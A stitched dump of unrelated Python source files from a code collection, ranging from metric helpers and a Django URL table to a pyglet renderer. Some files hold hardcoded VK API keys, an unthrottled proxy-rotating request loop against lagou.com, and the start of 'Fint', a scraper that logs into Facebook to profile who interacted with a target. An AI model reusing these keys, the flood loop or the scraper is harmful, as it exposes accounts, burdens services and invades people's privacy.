    return float(np.mean(np.abs(y_preds - y_actual)))
def rmse(y_preds: ndarray, y_actual: ndarray) -> float:
    """Root Mean Squared Error between predictions and targets.

    Args:
        y_preds: predicted values.
        y_actual: ground-truth values, broadcast-compatible with y_preds.

    Returns:
        sqrt(mean((y_preds - y_actual)^2)) as a plain Python float.
    """
    # float() makes the return type match the annotation (np.sqrt returns a
    # NumPy scalar).
    return float(np.sqrt(np.mean(np.power(y_preds - y_actual, 2))))
15,673 | e5503254321c4cc0f34cb08c4985842bbf89a55e | ##############################################
# Тут лежат API-ключи для работы с VkApi
##############################################
api_key = "71ce346062676bfa2d39d3bb17635a22fc556a0f3c07b78175c2f92c01c081f7c1674f31e0566ec52749d"
api_keyy = "31653914f8764433acff756be9b664e4711fa624e1cf739f85b549dbe25908ceb73b7e39a9d33f29f5dad"
peer_id = 113742536
|
15,674 | abb679e3fd79dbe4358568d73d41876470ab1713 | arr=[1100,1100,1110,10,1,234,2,5,1,66,100000,23,11,6,112,100,120,112,1300,1109,110,1100,-9,114,119]
#arr=[11,1,234,2,5,1,55]
arr1=[]  # output list, kept in ascending order
j=0
# Insertion sort (Python 2 syntax): place each value before the first
# existing element that is >= it; append when it exceeds everything so far.
for i in arr:
    if len(arr1)==0:
        arr1.append(i)
        continue
    for j in range(len(arr1)):
        if i<=arr1[j]:
            arr1.insert(j,i)
            break
        elif j==len(arr1)-1:
            arr1.append(i)
            break
print arr1
|
15,675 | 7083c3f02290f710b69b0a21bf43029bc661844c | import requests
import proxies
from threading import Thread
URL= 'https://www.lagou.com/'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3112.113 Safari/537.36',
           "Referer": "https://www.lagou.com/jobs/list_python"}
# NOTE(review): infinite fetch loop with no delay or error handling — each
# iteration requests the page through a fresh proxy from proxies.getproxies().
while True:
    a = requests.get(url=URL, headers=headers, proxies=proxies.getproxies())
    # a = requests.get(url=URL, headers=headers,)
print(a.content.decode()) |
15,676 | adc860a1fef633bba445ea2793e6a830f608d203 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'demoLimitsListWidget.ui'
#
# Created by: PyQt5 UI code generator 5.15.7
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """pyuic5-generated UI wrapper for a modal limits-selection dialog.

    Call setupUi(dialog) on a QDialog instance to build the widgets.  Per
    the generator's warning, avoid hand edits beyond comments — pyuic5
    regeneration overwrites this file.
    """
    def setupUi(self, Dialog):
        # Build the dialog: OK/Cancel button box, two labels, one list widget.
        Dialog.setObjectName("Dialog")
        Dialog.resize(400, 300)
        Dialog.setModal(True)
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(30, 260, 341, 32))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.limitsChoicesLabel = QtWidgets.QLabel(Dialog)
        self.limitsChoicesLabel.setGeometry(QtCore.QRect(10, 30, 101, 16))
        self.limitsChoicesLabel.setObjectName("limitsChoicesLabel")
        self.limitsChosenLabel = QtWidgets.QLabel(Dialog)
        self.limitsChosenLabel.setGeometry(QtCore.QRect(10, 230, 371, 20))
        self.limitsChosenLabel.setText("")
        self.limitsChosenLabel.setObjectName("limitsChosenLabel")
        self.listWidgetLimits = QtWidgets.QListWidget(Dialog)
        self.listWidgetLimits.setGeometry(QtCore.QRect(130, 30, 256, 192))
        self.listWidgetLimits.setObjectName("listWidgetLimits")
        self.retranslateUi(Dialog)
        self.buttonBox.accepted.connect(Dialog.accept) # type: ignore
        self.buttonBox.rejected.connect(Dialog.reject) # type: ignore
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        # Apply translatable UI strings (Qt Linguist hook).
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        self.limitsChoicesLabel.setText(_translate("Dialog", "Choose Limits:"))
|
15,677 | 44b1facd7fb6bf2fe21dbc4a4480a784a1d18375 | # Project 2 - Moonlander
#
# Name: James Plasko
# Instructor: Brian Jones
# Section: 21
import unittest
from lander_funcs import *
class TestCases(unittest.TestCase):
    """Unit tests for the moonlander physics helpers in lander_funcs."""
    def test_update_acc1(self):
        # No thrust: acceleration equals negative lunar gravity.
        self.assertAlmostEqual(update_acceleration(1.62, 0), -1.62)
    def test_update_acc2(self):
        # Thrust of 5 exactly cancels gravity.
        self.assertEqual(update_acceleration(1.62, 5), 0)
    def test_update_acc3(self):
        self.assertAlmostEqual(update_acceleration(1.62, 9), 1.296)
    def test_update_altitude1(self):
        self.assertAlmostEqual(update_altitude(130.6677, -1.62, -1.62), 128.2377)
    def test_update_altitude2(self):
        self.assertAlmostEqual(update_altitude(1300, -45.24, 1.296), 1255.408)
    def test_update_altitude3(self):
        self.assertAlmostEqual(update_altitude(123.42, 3.25, 2.45), 127.895)
    def test_update_velocity1(self):
        self.assertAlmostEqual(update_velocity(-23.543, 2.36), -21.183)
    def test_update_velocity2(self):
        self.assertAlmostEqual(update_velocity(2.49, -1.63), 0.86)
    def test_update_fuel1(self):
        self.assertEqual(update_fuel(500, 9), 491)
    def test_update_fuel2(self):
        # NOTE(review): the expected value implies fuel may go negative —
        # confirm clamping responsibility lies with the caller.
        self.assertEqual(update_fuel(4, 9), -5)
# Run the unit tests when executed directly.
if __name__ == '__main__':
    unittest.main()
|
15,678 | 8caf2e85ef6cbb9058b1db018609bc4b8cf2d784 | """Using word frequencies to create a summary.
"""
import argparse
import json
import string
import random
import pprint
from nltk import pos_tag
from nltk.collocations import BigramAssocMeasures
from nltk.collocations import BigramCollocationFinder
from nltk.corpus import wordnet
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.corpus import words as nltk_words
from nltk.stem import WordNetLemmatizer
from nltk.probability import FreqDist
import constants
###########################
# PART OF SPEECH TAG TRANSLATOR FROM `pos_tag` TAGS to `wordnet` TAGS
###########################
# source for tags: https://pythonprogramming.net/natural-language-toolkit-nltk-part-speech-tagging/
# NB: wordnet has a ADV_SAT tag, but I have no idea what that is
DEFAULT_TAG = wordnet.NOUN
POS_TRANSLATOR = {
'CC': DEFAULT_TAG, # coordinating conjunction
'CD': DEFAULT_TAG, # cardinal digit
'DT': DEFAULT_TAG, # determiner
'EX': DEFAULT_TAG, # existential there (like: "there is" ... think of it like "there exists")
'FW': DEFAULT_TAG, # foreign word
'IN': DEFAULT_TAG, # preposition/subordinating conjunction
'JJ': wordnet.ADJ, # adjective 'big'
'JJR': wordnet.ADJ, # adjective, comparative 'bigger'
'JJS': wordnet.ADJ, # adjective, superlative 'biggest'
'LS': DEFAULT_TAG, # list marker 1)
'MD': wordnet.VERB, # modal could, will
'NN': wordnet.NOUN, # noun, singular 'desk'
'NNS': wordnet.NOUN, # noun plural 'desks'
'NNP': wordnet.NOUN, # proper noun, singular 'Harrison'
'NNPS': wordnet.NOUN, # proper noun, plural 'Americans'
'PDT': wordnet.ADJ, # predeterminer 'all the kids'
'POS': DEFAULT_TAG, # possessive ending parent's
'PRP': DEFAULT_TAG, # personal pronoun I, he, she
'PRP$': DEFAULT_TAG, # possessive pronoun my, his, hers
'RB': wordnet.ADV, # adverb very, silently,
'RBR': wordnet.ADV, # adverb, comparative better
'RBS': wordnet.ADV, # adverb, superlative best
'RP': wordnet.ADV, # particle give up
'TO': DEFAULT_TAG, # to go 'to' the store.
'UH': DEFAULT_TAG, # interjection errrrrrrrm
'VB': wordnet.VERB, # verb, base form take
'VBD': wordnet.VERB, # verb, past tense took
'VBG': wordnet.VERB, # verb, gerund/present participle taking
'VBN': wordnet.VERB, # verb, past participle taken
'VBP': wordnet.VERB, # verb, sing. present, non-3d take
'VBZ': wordnet.VERB, # verb, 3rd person sing. present takes
'WDT': DEFAULT_TAG, # wh-determiner which
'WP': DEFAULT_TAG, # wh-pronoun who, what
'WP$': DEFAULT_TAG, # possessive wh-pronoun whose
'WRB': wordnet.ADV # wh-abverb where, when
}
def parse_arguments():
    """Parses command-line arguments.

    Returns:
    - args (argparse.Namespace): The parsed arguments
    """
    parser = argparse.ArgumentParser()
    # (short flag, long flag, type, default, help text)
    arg_specs = (
        ('-f', '--file', str, None, 'The path to the JSON file containing processed text'),
        ('-w', '--num_words', int, 20, 'The number of frequent words to print out'),
        ('-c', '--num_collocations', int, 10, 'The number of collocations to print out'),
        ('-cw', '--collocation_window', int, 5, 'The window for searching for collocations'),
    )
    for short_flag, long_flag, arg_type, arg_default, arg_help in arg_specs:
        parser.add_argument(short_flag, long_flag, type=arg_type, default=arg_default, help=arg_help)
    return parser.parse_args()
# End of parse_arguments()
def load_records(file, preview_records=False):
    """Loads the records from the JSON file. Also filters out empty records.

    Params:
    - file (str): The path to the JSON file (one JSON object per line)
    - preview_records (bool): When True, pretty-print a random sample of 10

    Returns:
    - records (list<dict>): The records whose text field is non-empty
    """
    with open(file, 'r') as json_file:
        parsed = [json.loads(line) for line in json_file]
    records = [record for record in parsed if record[constants.TEXT] != '']
    if preview_records:
        print("=====Random Sample of Records=====")
        pprint.pprint(random.choices(records, k=10))
    return records
# End of load_records()
def tokenize_records(records):
    """Tokenizes, filters and lemmatizes the text of the given records.

    NOTE(review): despite the name and the original docstring, this returns
    ONE flat list of lemmatized words across ALL records, not a list of word
    lists per record — confirm callers expect the flattened form.

    Params:
    - records (list<dict>): The non-empty records from the JSON file

    Returns:
    - lemmatized_words (list<str>): All lemmatized words, flattened
    """
    contents = map(lambda record: record[constants.TEXT], records)
    tokenized_records = [word_tokenize(record.lower()) for record in contents]
    lemmatized_records = lemmatize_words(tokenized_records)
    # Flatten the per-record word lists into a single list.
    lemmatized_words = list()
    for lemmatized_record in lemmatized_records:
        lemmatized_words.extend(lemmatized_record)
    return lemmatized_words
# End of tokenize_records()
def lemmatize_words(records):
    """Lemmatizes the words in the tokenized sentences.

    Lemmatization works best when the words are tagged with their corresponding part of speech, so the words are first
    tagged using nltk's `pos_tag` function, then filtered via filter_stopwords().

    NB: There is a good chance that this tagging isn't 100% accurate. For that matter, lemmatization isn't always 100%
    accurate.

    Params:
    - records (list<list<str>>): The word-tokenized records

    Returns:
    - lemmatized_records (list<list<str>>): The lemmatized words, one list per record
      (NOTE(review): the original docstring claimed a flat list<str>)
    """
    print('Length of tagged_records: {:d}'.format(len(records)))
    print('Total number of words: {:d}'.format(sum([len(record) for record in records])))
    tagged_records = map(lambda record: pos_tag(record), records)
    tagged_records = filter_stopwords(tagged_records)
    lemmatizer = WordNetLemmatizer()
    lemmatized_records = list()
    for record in tagged_records:
        try:
            # Lemmatize each (word, tag) pair using the wordnet POS class
            # mapped from the Penn Treebank tag.
            lemmatized_record = list(map(lambda word: lemmatizer.lemmatize(word[0], POS_TRANSLATOR[word[1]]), record))
        except Exception as err:
            # Dump the offending record before re-raising for diagnosis.
            print(record)
            raise err
        lemmatized_records.append(lemmatized_record)
    # NOTE(review): this prints the number of RECORDS, not words — the label
    # is misleading.
    print('Total number of words after filtering: {:d}'.format(len(lemmatized_records)))
    return lemmatized_records
# End of lemmatize_words()
def filter_stopwords(tagged_records):
    """Filters stopwords, punctuation, and contractions from the tagged records. This is done after tagging to make
    sure that the tagging is as accurate as possible.

    Params:
    - tagged_records (list<list<tuple<str, str>>>): The records, with each word tagged with its part of speech

    Returns:
    - filtered_records (list<list<tuple<str, str>>>): The records, with unimportant words filtered out
    """
    print('Filtering stopwords')
    stop_words = list(stopwords.words('english'))
    stop_words.extend(string.punctuation)
    stop_words.extend(constants.CONTRACTIONS)
    stop_words.extend(constants.MYSQL_STOPWORDS)
    dictionary_words = set(nltk_words.words())
    def not_dictionary_word(word):
        # True for words outside the dictionary that are not proper nouns.
        return word[0] not in dictionary_words and word[1] not in ['NNP', 'NNPS']
    filtered_records = [filter(lambda word: word[0] not in stop_words, record) for record in tagged_records]
    # BUG(review): the lambda returns the FUNCTION OBJECT (always truthy)
    # instead of calling it, so this filter keeps everything.  The intended
    # predicate is ambiguous (calling it would KEEP only non-dictionary
    # words), so it is flagged here rather than changed.
    filtered_records = [filter(lambda word: not_dictionary_word, record) for record in filtered_records]
    filtered_records = [filter(lambda word: not word[0].replace('.', '', 1).isdigit(), record)
                        for record in filtered_records]  # see https://stackoverflow.com/a/23639915/5760608
    filtered_records = [list(filter(lambda word: word[1] in POS_TRANSLATOR.keys(), record))
                        for record in filtered_records]
    return filtered_records
# End of filter_stopwords()
def extract_frequent_words(records, num_words, no_counts=False):
    """Counts word frequencies with NLTK's FreqDist and reports the top words.

    Params:
    - records (list<str>): The tokenized, lemmatized words from the JSON file
    - num_words (int): The number of words to extract
    - no_counts (bool): If True, frequent words will not include the word counts

    Returns:
    - frequent_words (list<str> or list<tuple<str, int>>): The list of most frequent words
    """
    distribution = FreqDist(records)
    frequent_words = distribution.most_common(num_words)
    if no_counts:
        # Strip the counts, keeping only the words themselves.
        frequent_words = [word for word, _count in frequent_words]
    print("=====The {:d} Most Frequent Words=====".format(num_words))
    print(frequent_words)
    return frequent_words
# End of extract_frequent_words()
def extract_collocations(records, num_collocations, collocation_window, compare_collocations=False):
    """Extracts the most common collocations present in the records.

    Params:
    - records (list<list<str>>): The tokenized and lemmatized records from the JSON file
    - num_collocations (int): The number of collocations to show
    - collocation_window (int): The text window within which to search for collocations
    - compare_collocations (bool): If True, also print rankings under several association measures

    Returns:
    - best_collocations (list<tuple<str>>): The highest scored collocations present in the records
    """
    measures = BigramAssocMeasures()
    finder = BigramCollocationFinder.from_words(records, window_size=collocation_window)
    # Ignore bigrams seen fewer than 3 times -- they are almost always noise.
    finder.apply_freq_filter(min_freq=3)
    best_collocations = finder.nbest(measures.raw_freq, num_collocations)
    print("=====The {:d} Most Frequent Collocations=====".format(num_collocations))
    pprint.pprint(best_collocations)
    if compare_collocations:
        # Each alternative scoring method, printed in the same order and with
        # the same headings as before.
        scoring_methods = [
            ("Pointwise Mutual Information", measures.pmi),
            ("Student's t test", measures.student_t),
            ("Chi-square test", measures.chi_sq),
            ("Mutual Information", measures.mi_like),
            ("Likelihood Ratios", measures.likelihood_ratio),
            ("Poisson Stirling", measures.poisson_stirling),
            ("Jaccard Index", measures.jaccard),
            ("Phi-square test", measures.phi_sq),
            ("Fisher's Exact Test", measures.fisher),
            ("Dice's Coefficient", measures.dice),
        ]
        for label, measure in scoring_methods:
            print("=====The {:d} Best Collocations ({})=====".format(num_collocations, label))
            pprint.pprint(finder.nbest(measure, num_collocations))
    return best_collocations
# End of extract_collocations()
# Script entry point: load and tokenize the records, then report the most
# frequent words and collocations found in them.
if __name__ == "__main__":
    args = parse_arguments()
    records = load_records(args.file, False)
    tokenized_records = tokenize_records(records)
    extract_frequent_words(tokenized_records, args.num_words, True)  # True: omit counts from output
    extract_collocations(tokenized_records, args.num_collocations, args.collocation_window, False)  # False: skip measure comparison
|
def readFile(file_path):
    """Return the entire contents of the text file at file_path.

    :param file_path: path of the file to read
    :return: the file's contents as a single string
    """
    # "with" guarantees the handle is closed even if read() raises
    # (the original leaked the handle on error).
    with open(file_path, 'r') as f:
        return f.read()
def writeFile(file_path, contents):
    """Write contents to file_path (creating/truncating it).

    :param file_path: destination path
    :param contents: string to write
    :return: the (closed) file object, mirroring the original contract
    """
    # "with" closes the handle even if write() raises (original leaked on error).
    with open(file_path, 'w+') as f:
        f.write(contents)
    return f
# Demo: copy docs/read.txt into docs/write.txt using the helpers above.
if __name__ == '__main__':
    file = readFile('docs/read.txt')  # NOTE(review): "file" shadows the Py2 builtin name
writeFile('docs/write.txt', file); |
15,680 | 180bbad65a2c3e278381dfa9f403db8caade9a54 | import simplejson as json
from .KalliopeiaClass import KalliopeiaClass
def preparate_kalliopeia(f_setting):
    """Build an authenticated KalliopeiaClass client from a JSON settings file.

    :param f_setting: path-like object whose open("r") yields the settings file;
        the JSON must contain "kalliopeia_url" and a "facilitator" with
        "name" and "password" keys
    :return: KalliopeiaClass instance with its f_token set
    """
    # Close the settings handle deterministically (the original never closed it).
    # Assumes f_setting.open("r") returns a context manager, as file objects do.
    with f_setting.open("r") as f:
        jsonData = json.load(f)
    toKalliopeia = KalliopeiaClass(jsonData["kalliopeia_url"])
    facilitator = jsonData["facilitator"]
    f_token = toKalliopeia.get_access_token(name=facilitator["name"], password=facilitator["password"])
    toKalliopeia.f_token = f_token
    return toKalliopeia
15,681 | 7a7414f20c8e206ed23563907ae8472c980628ad | import string
import random
num = random.randint(10000000000,20000000000)
print(num)
primearray = []
for i in range(1,num):
if num%i == 0:
print(i)
primearray =primearray + [i]
print(primearray)
primefac = []
print('\n')
for x in primearray:
primarr = []
for y in range(1,x+1):
if x%y == 0:
primarr = primarr + [y]
if len(primarr) == 2:
primefac = primefac + [x]
print(primefac) |
15,682 | 9e07364ac778040f4c195e3a446c90f3d8870ffe | from django.conf.urls import include, url, patterns
from django.views.generic import TemplateView
from accounts.views import service_provider, my_jobs_view, update_job, update_employer, application_questions, employer_page, update_social, social_links, update_documents, documents, update_language, language, update_skill, skills, education_form, update_education, education, update_work_experience, work_experience, update_job_criteria, job_criteria, update_user_profile, profile_userdetails, update_category, socialauth, signup, email_checkup_json, create_user, complete, confirm_verification, update_profile, user_details, deactivate_industry, activate_industry
from django.contrib.auth.views import password_change, password_change_done, password_reset, password_reset_done, password_reset_confirm, password_reset_complete
from accounts.views import JobListView
from django.views.generic import ListView
# URL routes for the accounts app. Django uses the FIRST pattern that matches,
# so ordering matters: specific routes first, the catch-all last.
urlpatterns = [
    url(r'^signup$', signup),
    url(r'^service-provider$', service_provider),
    url(r'^profile_home$', profile_userdetails, name="profile_details"),
    url(r'^job_criteria$', job_criteria, name="job_criteria"),
    url(r'^work_experience$', work_experience, name="work_experience"),
    url(r'^education$', education, name="education"),
    url(r'^skills$', skills, name="skills"),
    url(r'^language$', language, name="language"),
    url(r'^documents$', documents, name="documents"),
    url(r'^social-links$', social_links, name="social_links"),
    url(r'^application-questions$', application_questions, name="application_questions"),
    url(r'^post-job$', update_job, name="post_job"),
    url(r'^create-job$', my_jobs_view, name="create_job"),
    url(r'^complete_signup$', socialauth),
    url(r'^create_user$', create_user),
    url(r'^complete$', complete),
    url(r'^check_email$', email_checkup_json),
    url(r'^update_profile$', update_profile),
    url(r'^update_employer$', update_employer),
    url(r'^update_employer_2$', update_job),
    url(r'^update_user_profile$', update_user_profile),
    url(r'^update_job_criteria$', update_job_criteria),
    url(r'^update_work_experience$', update_work_experience),
    url(r'^update_education$', update_education),
    url(r'^update_skill$', update_skill),
    url(r'^update_language$', update_language),
    url(r'^update_documents$', update_documents),
    url(r'^unlink_social$', update_social),
    url(r'^update_category$', update_category),
    url(r'^user-details$', user_details, name="user_details"),
    url(r'^account_completion/(?P<user_id>\d+)/(?P<code>[-\w]+)$', confirm_verification, name="confirmation_link"),
    url(r'^industry-demote/(?P<work_id>\d+)/(?P<code>[-\w]+)$', deactivate_industry, name="deactivate_industry"),
    url(r'^industry-activate/(?P<work_id>\d+)/(?P<code>[-\w]+)$', activate_industry, name="activate_industry"),
    url(r'^work_experience_form$', TemplateView.as_view(template_name="snippets/work_experience_form.html")),
    url(r'^education_form$', education_form),
    url(r'^language_form$', TemplateView.as_view(template_name="snippets/language_form.html")),
    url(r'^link_form$', TemplateView.as_view(template_name="snippets/link_form.html")),
    url(r'^document_form$', TemplateView.as_view(template_name="snippets/document_form.html")),
    url(r'^price_form$', TemplateView.as_view(template_name="snippets/price_form.html")),
    # change password urls
    url(r'^password-change/$', password_change, name='password_change'),
    url(r'^password-change/done/$', password_change_done, name='password_change_done'),
    # restore password urls
    url(r'^password-reset/$', password_reset, name='password_reset'),
    url(r'^password-reset/done/$', password_reset_done, name='password_reset_done'),
    url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', password_reset_confirm, name='password_reset_confirm'),
    url(r'^password-reset/complete/$', password_reset_complete, name='password_reset_complete'),
    # BUG FIX: this catch-all previously appeared BEFORE the password routes.
    # Since r'^' matches every request path, every pattern after it was
    # unreachable; the catch-all must be the last entry.
    url(r'^', JobListView.as_view(), name='job-list'),
]
def prime_checker(number):
    """Print whether number is prime and return the boolean verdict.

    :param number: integer to test
    :return: True if number is prime, otherwise False
    """
    # Numbers below 2 are not prime by definition -- the original reported
    # 0, 1 and negatives as prime because the loop body never ran.
    isPrime = number >= 2
    for n in range(2, number):
        if number % n == 0:
            isPrime = False
            break  # one divisor is enough; no need to scan further
    if isPrime:
        print("It's a prime number.")
    else:
        print("It's not a prime number.")
    return isPrime
# Prompt the user for a number to classify.
n = int(input("Check this number: "))
prime_checker(number=n) |
15,684 | 536d3d4fcb74484647889d6139ba5af49b5f3ea4 | from functools import cached_property
from typing import ClassVar, List, Protocol
import pyglet
from pyglet import shapes
from codanim.drawable import add_to_batch
from codanim.element import Element
# mixing concerns between scene and scene renderer for now, but temporary
class Renderer(Protocol):
    """Structural interface for anything that can render a list of elements."""
    def draw(self, elements: List[Element]) -> None:
        """Render the given elements; implementations define how and where."""
        ...
class PygletSceneRenderer(Renderer):
    """Renders scene elements into a pyglet window.

    The window's on_draw callback is bound to this renderer, so drawing is
    driven by pyglet's event loop: draw() only records the elements and the
    actual batching happens in on_draw().
    """

    def __init__(self, configs):
        self.elements = None
        # Extra drawables rendered on top of the scene, e.g. an FPS counter.
        self.extra_drawables = []
        self.window = self.create_window()
        self.window.on_draw = self.on_draw
        # The config flag is optional; missing, None or falsy all mean
        # "no FPS display" (same behavior as the original walrus + is-not-None
        # + truthiness dance, just simpler).
        if getattr(configs, "enable_fps", False):
            fps_display = pyglet.window.FPSDisplay(window=self.window)
            self.extra_drawables.append(fps_display)

    def create_window(self):
        """Create the target window; override to customise size/options."""
        return pyglet.window.Window(960, 540)

    def draw(self, elements: List[Element]) -> None:
        """Record the elements to render and make this window's GL context current."""
        self.elements = elements
        self.window.switch_to()

    def on_draw(self) -> None:
        """Window draw callback: batch and render all stored elements."""
        self.window.clear()
        if not self.elements:
            print("No elements to draw.")
            return
        batch = pyglet.graphics.Batch()
        # Keep references to batched objects, or pyglet will lose them
        # before batch.draw() is called.
        refs = []
        for element in self.elements:
            refs.extend(element.add_to_batch(batch))
        batch.draw()
        for drawable in self.extra_drawables:
            drawable.draw()
class SceneBase:
    """Base class for scenes; subclasses implement construct() to build elements."""

    # Renderer implementation instantiated lazily by the `renderer` property.
    renderer_cls: ClassVar[type] = PygletSceneRenderer

    def construct(self):
        """Build and return the scene's elements; must be overridden."""
        raise NotImplementedError

    @cached_property
    def renderer(self):
        """Lazily create (and memoize) the renderer, passing the nested Configs."""
        return self.renderer_cls(self.Configs)

    class Configs:
        """Per-scene renderer configuration; subclasses add attributes (e.g. enable_fps)."""
        pass
class StaticScene(SceneBase):
    """A scene whose elements are rebuilt from scratch on every draw tick."""

    def construct(self) -> List[Element]:
        """Return the full element list for one frame; must be overridden."""
        raise NotImplementedError

    def draw(self, dt):
        # dt is accepted to fit pyglet's clock-callback signature but is unused.
        elements = self.construct()
        self.renderer.draw(elements)
|
15,685 | 6ab7a40e87d83dff8ed7228ba48812cc1b182380 | from datos.registros import RegistroData
class RegistroLogic():
    """Business-logic facade over RegistroData for money records ("registros")."""

    @staticmethod
    def insert_one(registro):
        """Persist a new record."""
        RegistroData.create_registro(registro)

    @staticmethod
    def get_by_id(registro_id):
        """Fetch a single record by its id."""
        return RegistroData.get_by_id(registro_id)

    @staticmethod
    def update_registro(registro_id, registro):
        """Overwrite the record identified by registro_id."""
        RegistroData.update_registro(registro_id, registro)

    @staticmethod
    def find_by_categoria(categoria):
        """Return the records tagged with the given category."""
        return RegistroData.find_by_categoria(categoria)

    @staticmethod
    def get_lasts_registers(userid, top):
        """Return the user's `top` most recent records as a list."""
        return list(RegistroData.get_lasts_registers(userid, top))

    @staticmethod
    def get_balance(userid):
        """Sum the user's amounts: "gasto" subtracts, "ingreso" adds.

        Each amount is rounded to 2 decimals before accumulating
        (preserved from the original implementation).
        """
        montos = list(RegistroData.get_montos(userid))
        count = 0
        for m in montos:
            if m["tipo"] == "gasto":
                count = count - float(format(m["valor"], ".2f"))
            elif m["tipo"] == "ingreso":
                count = count + float(format(m["valor"], ".2f"))
        return count

    @staticmethod
    def get_sueldo(userid):
        """Return the user's salary value, or a message when none is stored."""
        try:
            sueldo = RegistroData.get_sueldo(userid)
            if sueldo is not None:
                return sueldo["valor"]
            else:
                return "No hay sueldos cargados"
        except ValueError as e:
            # BUG FIX: the original passed `format(e)` as a second print
            # argument (comma instead of ".format"), so the {0} placeholder
            # was never filled.
            print("Error en la conversión de tipo de dato: {0}".format(e))

    @staticmethod
    def get_tipos(userid):
        """Aggregate the user's amounts by record type ("tipo")."""
        cur = RegistroData.get_registros(userid)
        cat = {}
        for i in cur:
            a = i['tipo']
            if a in cat:  # membership test directly on the dict (was `in list(cat)`)
                cat[a] = cat[a] + i['valor']
            else:
                cat[a] = i['valor']
        print(cat)
        return cat

    @staticmethod
    def get_cats(userid, tipo):
        """Aggregate amounts per category for records of the given type."""
        registros = RegistroData.get_categorias(userid, tipo)
        c = {}
        for r in registros:
            for categoria in r["categoria"]:
                if categoria in c:
                    c[categoria] += r["valor"]
                else:
                    c[categoria] = r["valor"]
        return c

    @staticmethod
    def get_cats_names(userid, tipo):
        """Return the distinct category names for records of the given type."""
        registros = RegistroData.get_categorias(userid, tipo)
        cat_nombres = []
        for r in registros:
            for categoria in r["categoria"]:
                if categoria not in cat_nombres:
                    cat_nombres.append(categoria)
        return cat_nombres
15,686 | 4c6befbf09bb465c760cf41b9037e6c50de292a6 | import re, os, csv, sys, time
import json, random, argparse
from collections import Counter
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import TimeoutException, NoSuchElementException
# Program metadata used in the startup banner.
VERSION = "0.2"
BANNER = """
{0} v. {1} - Fint: Find users who interacted with a profile
by sowdust
""".format(sys.argv[0], VERSION)
# All scraping goes through the "mbasic" (plain-HTML) Facebook front-end,
# which is far easier to parse than the JavaScript-heavy site.
BASE_URL = 'https://mbasic.facebook.com'
def log(m):
    """Verbose-logging hook; currently disabled, so the message is discarded."""
    return None
def pause(min=2, max=5):
    """Return a random delay in seconds, uniform in [min, max], rounded to one decimal.

    NOTE: despite the name, this does not sleep -- callers pass the result
    to time.sleep() themselves.
    """
    delay = random.uniform(min, max)
    return round(delay, 1)
def do_login(driver, usr, pwd):
    """Log into facebook.com with the given credentials via the selenium driver.

    Cookie-banner failures are reported but non-fatal; login-form failures
    that are not a simple missing-element fallback abort the program.
    """
    log('[*] Trying to log in with user %s' % usr)  # log() is currently a no-op
    driver.get('https://www.facebook.com')
    try:
        # Dismiss the cookie consent banner if present.
        elem = driver.find_element_by_xpath('//button[@data-cookiebanner="accept_button"]')
        elem.click()
    except Exception as ex:
        print('[!] Error while accepting cookies:')
        print(ex)
    try:
        elem = driver.find_element_by_id('email')
        elem.send_keys(usr)
        elem = driver.find_element_by_id('pass')
        elem.send_keys(pwd)
    except NoSuchElementException:
        # Fallback: some page variants expose the fields by name, not id.
        # NOTE(review): an exception raised inside this handler is NOT caught
        # by the Exception branch below -- confirm that is acceptable.
        elem = driver.find_element_by_name('email')
        elem.send_keys(usr)
        elem = driver.find_element_by_name('pass')
        elem.send_keys(pwd)
    except Exception as ex:
        print('[!] Error while logging in:')
        print(ex)
        sys.exit(0)
    # Submit the form from whichever field was filled last.
    elem.send_keys(Keys.RETURN)
    time.sleep(pause(2, 3))
def check_login(driver):
    """Verify the session is logged in; exit the program otherwise.

    A logged-in page always contains a link to the user's own profile
    ('href="/me/"'), which is used as the success marker.
    """
    time.sleep(pause(3, 4))  # give the post-login redirect time to settle
    if 'href="/me/"' not in driver.page_source:
        print('[!] Not logged in. Did you use valid credentials?')
        print(driver.page_source)
        sys.exit(0)
    else:
        log('[*] Logged in')  # log() is currently a no-op
def get_stories_urls(html, target):
    """Extract story.php URLs from mbasic HTML, keeping only stories by `target`.

    NOTE(review): the ownership filter is a plain substring test, so target
    '1' would also match 'id=12' links -- confirm ids are exact upstream.
    """
    owner_marker = 'id=%s' % target
    candidates = set(re.findall('(/story.php\?story_fbid=[^"#]+)', html))
    urls = []
    for link in candidates:
        if owner_marker in link:
            urls.append('%s%s' % (BASE_URL, link.replace('&amp;', '&')))
    return urls
def get_photos_urls(target_id, html):
    """Extract photo.php URLs owned by target_id from mbasic HTML.

    Matching keys on the ';id=<target_id>' fragment produced by the
    HTML-escaped '&amp;id=' query parameter.
    """
    pattern = '(/photo\.php\?[^;]*;id=%s[^"]+)' % target_id
    found = set(re.findall(pattern, html))
    return ['%s%s' % (BASE_URL, link.replace('&amp;', '&')) for link in found]
def get_all_photos(driver, target_id, limit=100):
    """Collect up to `limit` photo URLs from the target's photos page.

    Navigates the mbasic photos view and follows the "See More Photos" /
    "Show more" pagination links until the limit is reached or no more
    pages exist. Returns a (possibly empty) list of absolute URLs.
    """
    url = 'https://mbasic.facebook.com/profile.php?id=%s&v=photos' % target_id
    driver.get(url)
    time.sleep(pause())
    # The photos tab only shows a preview; "See All" leads to the full album list.
    see_all = re.findall('<a href="([^"#]+)">See All</a>', driver.page_source)
    photos = []
    if not see_all:
        return photos
    else:
        driver.get(BASE_URL + see_all[0].replace('&amp;', '&'))
    while len(photos) < limit:
        photos += get_photos_urls(target_id, driver.page_source)
        see_more = re.findall(
